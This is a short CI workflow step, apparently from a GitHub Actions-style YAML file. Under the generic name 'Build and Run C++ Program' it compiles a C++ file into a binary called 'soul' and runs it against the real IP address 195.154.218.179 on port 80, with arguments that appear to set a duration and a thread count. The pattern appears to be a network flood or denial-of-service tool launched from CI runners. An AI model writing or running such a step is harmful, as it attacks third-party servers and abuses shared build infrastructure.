- name: Build and Run C++ Program
  script: |
    echo "Compiling..."
    clang++ -std=c++14 -O3 -march=native lmao.cpp -o soul -pthread

    echo "Making executable..."
    chmod +x soul

    echo "Running..."
    ./soul 195.154.218.179 80 60 200
